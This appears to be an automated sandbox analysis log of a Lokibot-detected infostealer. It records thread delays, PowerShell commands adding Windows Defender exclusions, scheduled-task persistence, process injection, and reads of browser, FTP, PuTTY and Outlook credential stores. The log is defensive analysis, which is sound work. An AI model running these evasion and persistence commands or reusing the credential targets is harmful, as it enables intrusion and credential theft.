Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3232	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3336	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3380	Thread sleep time: -1020000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3464	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3764	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3924	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe

Code function: 21_2_0040317B mov eax, dword ptr fs:[00000030h]

21_2_0040317B

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe

Code function: 21_2_00402B7C GetProcessHeap,HeapAlloc,

21_2_00402B7C

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory written: C:\Users\user\AppData\Roaming\sharon38892.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory written: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Queries volume information: C:\Users\user\AppData\Roaming\sharon38892.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Queries volume information: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sharon38892.exe PID: 3376, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
